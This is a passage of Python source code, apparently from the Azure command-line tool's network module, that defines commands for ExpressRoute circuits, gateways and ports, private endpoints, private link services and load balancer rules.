type='expressRouteCircuits',
name=circuit_name,
child_type_1='peerings',
child_name_1=peering_name
)
conn = ExpressRouteCircuitConnection(
express_route_circuit_peering=SubResource(id=source_circuit),
peer_express_route_circuit_peering=SubResource(id=peer_circuit),
address_prefix=address_prefix,
authorization_key=authorization_key
)
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def _validate_ipv6_address_prefixes(prefixes):
from ipaddress import ip_network, IPv6Network
prefixes = prefixes if isinstance(prefixes, list) else [prefixes]
version = None
for prefix in prefixes:
try:
network = ip_network(prefix)
if version is None:
version = type(network)
else:
if not isinstance(network, version): # pylint: disable=isinstance-second-argument-not-valid-type
raise CLIError("usage error: '{}' incompatible mix of IPv4 and IPv6 address prefixes."
.format(prefixes))
except ValueError:
raise CLIError("usage error: prefix '{}' is not recognized as an IPv4 or IPv6 address prefix."
.format(prefix))
return version == IPv6Network
def create_express_route_peering(
cmd, client, resource_group_name, circuit_name, peering_type, peer_asn, vlan_id,
primary_peer_address_prefix, secondary_peer_address_prefix, shared_key=None,
advertised_public_prefixes=None, customer_asn=None, routing_registry_name=None,
route_filter=None, legacy_mode=None, ip_version='IPv4'):
(ExpressRouteCircuitPeering, ExpressRouteCircuitPeeringConfig, RouteFilter) = \
cmd.get_models('ExpressRouteCircuitPeering', 'ExpressRouteCircuitPeeringConfig', 'RouteFilter')
if cmd.supported_api_version(min_api='2018-02-01'):
ExpressRoutePeeringType = cmd.get_models('ExpressRoutePeeringType')
else:
ExpressRoutePeeringType = cmd.get_models('ExpressRouteCircuitPeeringType')
if ip_version == 'IPv6' and cmd.supported_api_version(min_api='2020-08-01'):
Ipv6ExpressRouteCircuitPeeringConfig = cmd.get_models('Ipv6ExpressRouteCircuitPeeringConfig')
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
microsoft_config = ExpressRouteCircuitPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
else:
microsoft_config = None
ipv6 = Ipv6ExpressRouteCircuitPeeringConfig(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
peering = ExpressRouteCircuitPeering(peering_type=peering_type, ipv6_peering_config=ipv6, peer_asn=peer_asn,
vlan_id=vlan_id)
else:
peering = ExpressRouteCircuitPeering(
peering_type=peering_type, peer_asn=peer_asn, vlan_id=vlan_id,
primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
shared_key=shared_key)
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
peering.microsoft_peering_config = ExpressRouteCircuitPeeringConfig(
advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
if cmd.supported_api_version(min_api='2016-12-01') and route_filter:
peering.route_filter = RouteFilter(id=route_filter)
if cmd.supported_api_version(min_api='2017-10-01') and legacy_mode is not None:
peering.microsoft_peering_config.legacy_mode = legacy_mode
return client.begin_create_or_update(resource_group_name, circuit_name, peering_type, peering)
def _create_or_update_ipv6_peering(cmd, config, primary_peer_address_prefix, secondary_peer_address_prefix,
route_filter, advertised_public_prefixes, customer_asn, routing_registry_name):
if config:
# update scenario
with cmd.update_context(config) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
if route_filter:
RouteFilter = cmd.get_models('RouteFilter')
config.route_filter = RouteFilter(id=route_filter)
else:
# create scenario
IPv6Config, MicrosoftPeeringConfig = cmd.get_models(
'Ipv6ExpressRouteCircuitPeeringConfig', 'ExpressRouteCircuitPeeringConfig')
microsoft_config = MicrosoftPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
config = IPv6Config(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
return config
def update_express_route_peering(cmd, instance, peer_asn=None, primary_peer_address_prefix=None,
secondary_peer_address_prefix=None, vlan_id=None, shared_key=None,
advertised_public_prefixes=None, customer_asn=None,
routing_registry_name=None, route_filter=None, ip_version='IPv4',
legacy_mode=None):
# update settings common to all peering types
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('vlan_id', vlan_id)
c.set_param('shared_key', shared_key)
if ip_version == 'IPv6':
# update is the only way to add IPv6 peering options
instance.ipv6_peering_config = _create_or_update_ipv6_peering(cmd, instance.ipv6_peering_config,
primary_peer_address_prefix,
secondary_peer_address_prefix, route_filter,
advertised_public_prefixes, customer_asn,
routing_registry_name)
else:
# IPv4 Microsoft Peering (or non-Microsoft Peering)
with cmd.update_context(instance) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
if route_filter is not None:
RouteFilter = cmd.get_models('RouteFilter')
instance.route_filter = RouteFilter(id=route_filter)
try:
with cmd.update_context(instance.microsoft_peering_config) as c:
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
c.set_param('legacy_mode', legacy_mode)
except AttributeError:
raise CLIError('--advertised-public-prefixes, --customer-asn, --routing-registry-name and '
'--legacy-mode are only applicable for Microsoft Peering.')
return instance
# endregion
# region ExpressRoute Connection
# pylint: disable=unused-argument
def create_express_route_connection(cmd, resource_group_name, express_route_gateway_name, connection_name,
peering, circuit_name=None, authorization_key=None, routing_weight=None,
enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
ExpressRouteConnection, SubResource, RoutingConfiguration, PropagatedRouteTable\
= cmd.get_models('ExpressRouteConnection', 'SubResource', 'RoutingConfiguration', 'PropagatedRouteTable')
client = network_client_factory(cmd.cli_ctx).express_route_connections
propagated_route_tables = PropagatedRouteTable(
labels=labels,
ids=[SubResource(id=propagated_route_table) for propagated_route_table in
propagated_route_tables] if propagated_route_tables else None
)
routing_configuration = RoutingConfiguration(
associated_route_table=SubResource(id=associated_route_table),
propagated_route_tables=propagated_route_tables
)
connection = ExpressRouteConnection(
name=connection_name,
express_route_circuit_peering=SubResource(id=peering) if peering else None,
authorization_key=authorization_key,
routing_weight=routing_weight,
routing_configuration=routing_configuration
)
if enable_internet_security and cmd.supported_api_version(min_api='2019-09-01'):
connection.enable_internet_security = enable_internet_security
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, connection_name, connection)
# pylint: disable=unused-argument
def update_express_route_connection(instance, cmd, circuit_name=None, peering=None, authorization_key=None,
routing_weight=None, enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
SubResource = cmd.get_models('SubResource')
if peering is not None:
instance.express_route_connection_id = SubResource(id=peering)
if authorization_key is not None:
instance.authorization_key = authorization_key
if routing_weight is not None:
instance.routing_weight = routing_weight
if enable_internet_security is not None and cmd.supported_api_version(min_api='2019-09-01'):
instance.enable_internet_security = enable_internet_security
if associated_route_table is not None or propagated_route_tables is not None or labels is not None:
if instance.routing_configuration is None:
RoutingConfiguration = cmd.get_models('RoutingConfiguration')
instance.routing_configuration = RoutingConfiguration()
if associated_route_table is not None:
instance.routing_configuration.associated_route_table = SubResource(id=associated_route_table)
if propagated_route_tables is not None or labels is not None:
if instance.routing_configuration.propagated_route_tables is None:
PropagatedRouteTable = cmd.get_models('PropagatedRouteTable')
instance.routing_configuration.propagated_route_tables = PropagatedRouteTable()
if propagated_route_tables is not None:
instance.routing_configuration.propagated_route_tables.ids = [SubResource(id=propagated_route_table) for propagated_route_table in propagated_route_tables] # pylint: disable=line-too-long
if labels is not None:
instance.routing_configuration.propagated_route_tables.labels = labels
return instance
# endregion
# region ExpressRoute Gateways
def create_express_route_gateway(cmd, resource_group_name, express_route_gateway_name, location=None, tags=None,
min_val=2, max_val=None, virtual_hub=None):
ExpressRouteGateway, SubResource = cmd.get_models('ExpressRouteGateway', 'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_gateways
gateway = ExpressRouteGateway(
location=location,
tags=tags,
virtual_hub=SubResource(id=virtual_hub) if virtual_hub else None
)
if min or max:
gateway.auto_scale_configuration = {'bounds': {'min': min_val, 'max': max_val}}
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, gateway)
def update_express_route_gateway(instance, cmd, tags=None, min_val=None, max_val=None):
def _ensure_autoscale():
if not instance.auto_scale_configuration:
ExpressRouteGatewayPropertiesAutoScaleConfiguration, \
ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds = cmd.get_models(
'ExpressRouteGatewayPropertiesAutoScaleConfiguration',
'ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds')
instance.auto_scale_configuration = ExpressRouteGatewayPropertiesAutoScaleConfiguration(
bounds=ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds(min=min, max=max))
if tags is not None:
instance.tags = tags
if min is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.min = min_val
if max is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.max = max_val
return instance
def list_express_route_gateways(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_gateways
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
# endregion
# region ExpressRoute ports
def create_express_route_port(cmd, resource_group_name, express_route_port_name, location=None, tags=None,
peering_location=None, bandwidth_in_gbps=None, encapsulation=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ExpressRoutePort = cmd.get_models('ExpressRoutePort')
if bandwidth_in_gbps is not None:
bandwidth_in_gbps = int(bandwidth_in_gbps)
port = ExpressRoutePort(
location=location,
tags=tags,
peering_location=peering_location,
bandwidth_in_gbps=bandwidth_in_gbps,
encapsulation=encapsulation
)
return client.begin_create_or_update(resource_group_name, express_route_port_name, port)
def update_express_route_port(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags, True)
return instance
def download_generated_loa_as_pdf(cmd,
resource_group_name,
express_route_port_name,
customer_name,
file_path='loa.pdf'):
import os
import base64
dirname, basename = os.path.dirname(file_path), os.path.basename(file_path)
if basename == '':
basename = 'loa.pdf'
elif basename.endswith('.pdf') is False:
basename = basename + '.pdf'
file_path = os.path.join(dirname, basename)
generate_express_route_ports_loa_request =\
cmd.get_models('GenerateExpressRoutePortsLOARequest')(customer_name=customer_name)
client = network_client_factory(cmd.cli_ctx).express_route_ports
response = client.generate_loa(resource_group_name, express_route_port_name,
generate_express_route_ports_loa_request)
encoded_content = base64.b64decode(response.encoded_content)
from azure.cli.core.azclierror import FileOperationError
try:
with open(file_path, 'wb') as f:
f.write(encoded_content)
except OSError as ex:
raise FileOperationError(ex)
logger.warning("The generated letter of authorization is saved at %s", file_path)
def list_express_route_ports(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def assign_express_route_port_identity(cmd, resource_group_name, express_route_port_name,
user_assigned_identity, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity', 'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_identity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_identity_instance
identity_instance = ManagedServiceIdentity(type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance)
ports.identity = identity_instance
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def remove_express_route_port_identity(cmd, resource_group_name, express_route_port_name, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
if ports.identity is None:
logger.warning("The identity of the ExpressRoute Port doesn't exist.")
return ports
ports.identity = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def show_express_route_port_identity(cmd, resource_group_name, express_route_port_name):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
return ports.identity
def update_express_route_port_link(cmd, instance, parent, express_route_port_name, link_name,
macsec_cak_secret_identifier=None, macsec_ckn_secret_identifier=None,
macsec_sci_state=None, macsec_cipher=None, admin_state=None):
"""
:param cmd:
:param instance: an instance of ExpressRoutePort
:param express_route_port_name:
:param link_name:
:param macsec_cak_secret_identifier:
:param macsec_ckn_secret_identifier:
:param macsec_cipher:
:param admin_state:
:return:
"""
if any([macsec_cak_secret_identifier, macsec_ckn_secret_identifier, macsec_cipher, macsec_sci_state]):
instance.mac_sec_config.cak_secret_identifier = macsec_cak_secret_identifier
instance.mac_sec_config.ckn_secret_identifier = macsec_ckn_secret_identifier
# TODO https://github.com/Azure/azure-rest-api-specs/issues/7569
# need to remove this conversion when the issue is fixed.
if macsec_cipher is not None:
macsec_ciphers_tmp = {'gcm-aes-128': 'GcmAes128', 'gcm-aes-256': 'GcmAes256'}
macsec_cipher = macsec_ciphers_tmp.get(macsec_cipher, macsec_cipher)
instance.mac_sec_config.cipher = macsec_cipher
instance.mac_sec_config.sci_state = macsec_sci_state
if admin_state is not None:
instance.admin_state = admin_state
return parent
# endregion
# region PrivateEndpoint
def create_private_endpoint(cmd, resource_group_name, private_endpoint_name, subnet,
private_connection_resource_id, connection_name, group_ids=None,
virtual_network_name=None, tags=None, location=None,
request_message=None, manual_request=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
PrivateEndpoint, Subnet, PrivateLinkServiceConnection = cmd.get_models('PrivateEndpoint',
'Subnet',
'PrivateLinkServiceConnection')
pls_connection = PrivateLinkServiceConnection(private_link_service_id=private_connection_resource_id,
group_ids=group_ids,
request_message=request_message,
name=connection_name)
private_endpoint = PrivateEndpoint(
location=location,
tags=tags,
subnet=Subnet(id=subnet)
)
if manual_request:
private_endpoint.manual_private_link_service_connections = [pls_connection]
else:
private_endpoint.private_link_service_connections = [pls_connection]
if edge_zone:
private_endpoint.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def update_private_endpoint(instance, cmd, tags=None, request_message=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
if request_message is not None:
if instance.private_link_service_connections:
instance.private_link_service_connections[0].request_message = request_message
else:
instance.manual_private_link_service_connections[0].request_message = request_message
return instance
def list_private_endpoints(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def create_private_endpoint_private_dns_zone_group(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneGroup, PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneGroup', 'PrivateDnsZoneConfig')
private_dns_zone_group = PrivateDnsZoneGroup(name=private_dns_zone_group_name,
private_dns_zone_configs=[PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, # pylint: disable=line-too-long
name=private_dns_zone_name)]) # pylint: disable=line-too-long
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def add_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneConfig')
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone = PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, name=private_dns_zone_name)
private_dns_zone_group.private_dns_zone_configs.append(private_dns_zone)
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def remove_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone_configs = [item for item in private_dns_zone_group.private_dns_zone_configs if item.name != private_dns_zone_name] # pylint: disable=line-too-long
private_dns_zone_group.private_dns_zone_configs = private_dns_zone_configs
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
# endregion
# region PrivateLinkService
def create_private_link_service(cmd, resource_group_name, service_name, subnet, frontend_ip_configurations,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
virtual_network_name=None, public_ip_address=None,
location=None, tags=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None,
enable_proxy_protocol=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
FrontendIPConfiguration, PrivateLinkService, PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = \
cmd.get_models('FrontendIPConfiguration', 'PrivateLinkService', 'PrivateLinkServiceIpConfiguration',
'PublicIPAddress', 'Subnet')
pls_ip_config = PrivateLinkServiceIpConfiguration(
name='{}_ipconfig_0'.format(service_name),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service = PrivateLinkService(
location=location,
load_balancer_frontend_ip_configurations=frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
],
ip_configurations=[pls_ip_config],
visbility=visibility,
auto_approval=auto_approval,
fqdns=fqdns,
tags=tags,
enable_proxy_protocol=enable_proxy_protocol
)
if edge_zone:
link_service.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def update_private_link_service(instance, cmd, tags=None, frontend_ip_configurations=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None, enable_proxy_protocol=None):
FrontendIPConfiguration = cmd.get_models('FrontendIPConfiguration')
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('load_balancer_frontend_ip_configurations', frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
])
c.set_param('visibility', visibility)
c.set_param('auto_approval', auto_approval)
c.set_param('fqdns', fqdns)
c.set_param('enable_proxy_protocol', enable_proxy_protocol)
return instance
def list_private_link_services(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def update_private_endpoint_connection(cmd, resource_group_name, service_name, pe_connection_name,
connection_status, description=None, action_required=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateEndpointConnection, PrivateLinkServiceConnectionState = cmd.get_models('PrivateEndpointConnection',
'PrivateLinkServiceConnectionState')
connection_state = PrivateLinkServiceConnectionState(
status=connection_status,
description=description,
actions_required=action_required
)
pe_connection = PrivateEndpointConnection(
private_link_service_connection_state=connection_state
)
return client.update_private_endpoint_connection(resource_group_name, service_name, pe_connection_name, pe_connection) # pylint: disable=line-too-long
def add_private_link_services_ipconfig(cmd, resource_group_name, service_name,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
subnet=None, virtual_network_name=None, public_ip_address=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = cmd.get_models('PrivateLinkServiceIpConfiguration',
'PublicIPAddress',
'Subnet')
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_name_index = len(link_service.ip_configurations)
ip_config = PrivateLinkServiceIpConfiguration(
name='{0}_ipconfig_{1}'.format(service_name, ip_name_index),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service.ip_configurations.append(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def remove_private_link_services_ipconfig(cmd, resource_group_name, service_name, ip_config_name):
client = network_client_factory(cmd.cli_ctx).private_link_services
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_config = None
for item in link_service.ip_configurations:
if item.name == ip_config_name:
ip_config = item
break
if ip_config is None: # pylint: disable=no-else-return
logger.warning("%s ip configuration doesn't exist", ip_config_name)
return link_service
else:
link_service.ip_configurations.remove(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
# endregion
def _edge_zone_model(cmd, edge_zone):
ExtendedLocation, ExtendedLocationTypes = cmd.get_models('ExtendedLocation', 'ExtendedLocationTypes')
return ExtendedLocation(name=edge_zone, type=ExtendedLocationTypes.EDGE_ZONE)
# region LoadBalancers
def create_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
public_ip_dns_name=None, subnet=None, subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
no_wait=False, sku=None, frontend_ip_zone=None, public_ip_zone=None,
private_ip_address_version=None, edge_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if edge_zone and cmd.supported_api_version(min_api='2020-08-01'):
edge_zone_type = 'EdgeZone'
else:
edge_zone_type = None
if subnet_type == 'new':
lb_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(
network_id_template, virtual_network_name, subnet)
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, None, edge_zone, edge_zone_type))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, subnet_id, private_ip_address, private_ip_allocation, sku,
frontend_ip_zone, private_ip_address_version, None, edge_zone, edge_zone_type)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def list_load_balancer_nic(cmd, resource_group_name, load_balancer_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_network_interfaces
return client.list(resource_group_name, load_balancer_name)
def create_lb_inbound_nat_rule(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port,
backend_port, frontend_ip_name=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None):
InboundNatRule = cmd.get_models('InboundNatRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) # pylint: disable=no-member
new_rule = InboundNatRule(
name=item_name, protocol=protocol,
frontend_port=frontend_port, backend_port=backend_port,
frontend_ip_configuration=frontend_ip,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
upsert_to_collection(lb, 'inbound_nat_rules', new_rule, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_rules, item_name)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get(client, resource_group_name, load_balancer_name):
lb = client.get(resource_group_name, load_balancer_name)
return lb_get_operation(lb)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get_operation(lb):
for item in lb.frontend_ip_configurations:
if item.zones is not None and len(item.zones) >= 3 and item.subnet is None:
item.zones = None
return lb
def set_lb_inbound_nat_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None):
if frontend_ip_name:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_floating_ip', floating_ip)
return parent
def create_lb_inbound_nat_pool(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port_range_start,
frontend_port_range_end, backend_port, frontend_ip_name=None, enable_tcp_reset=None,
floating_ip=None, idle_timeout=None):
InboundNatPool = cmd.get_models('InboundNatPool')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) \
if frontend_ip_name else None
new_pool = InboundNatPool(
name=item_name,
protocol=protocol,
frontend_ip_configuration=frontend_ip,
frontend_port_range_start=frontend_port_range_start,
frontend_port_range_end=frontend_port_range_end,
backend_port=backend_port,
enable_tcp_reset=enable_tcp_reset,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout)
upsert_to_collection(lb, 'inbound_nat_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_pools, item_name)
def set_lb_inbound_nat_pool(
cmd, instance, parent, item_name, protocol=None,
frontend_port_range_start=None, frontend_port_range_end=None, backend_port=None,
frontend_ip_name=None, enable_tcp_reset=None, floating_ip=None, idle_timeout=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port_range_start', frontend_port_range_start)
c.set_param('frontend_port_range_end', frontend_port_range_end)
c.set_param('backend_port', backend_port)
c.set_param('enable_floating_ip', floating_ip)
c.set_param('idle_timeout_in_minutes', idle_timeout)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
if frontend_ip_name == '':
instance.frontend_ip_configuration = None
elif frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
return parent
def create_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, subnet=None, virtual_network_name=None, private_ip_address=None,
private_ip_address_version=None, private_ip_address_allocation=None, zone=None):
FrontendIPConfiguration, SubResource, Subnet = cmd.get_models(
